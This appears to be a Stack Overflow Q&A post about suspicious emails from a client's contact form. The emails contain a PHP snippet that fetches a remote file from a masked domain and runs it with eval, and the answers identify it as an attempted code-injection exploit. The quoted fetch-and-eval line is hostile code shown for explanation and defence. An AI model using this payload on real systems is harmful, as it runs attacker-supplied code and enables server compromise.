# I don't understand some php code that is inserted in an e-mail we receive

Tags: php, email

My client tells me that he regularly receives in his email box (linked to his contact form on his own website) this type of message:

> -----Message d'origine----- De :  Envoyé : Aucune Objet :
>
> $a = get_contents('http://********.com.co//wp-admin/images/pel.jpeg');
> eval('?>'.$a);

I replaced the domain name in the url by **** for confidentiality reasons.
The domain name in the url of the get_contents function is unknown to us.

Do you have any idea what it could be? Spam ? Bad configuration ?
Thanks in advance for your advice !

Comment: The code looks like it is trying to load an image but there is no way to figure out what this is supposed to do without any context and the purpose of Stackoverflow is not to try to understand what developers you don't know tried to do.

Comment: It looks like someone put some code into the input form expecting it might be executed as PHP code before the mail was sent, but the exploit failed.

Answer (score 3, accepted):

It's an attempt to exploit (an apparently non-existent) [code injection vulnerability](https://owasp.org/www-community/attacks/Code_Injection). The use of `eval` is a dead giveaway.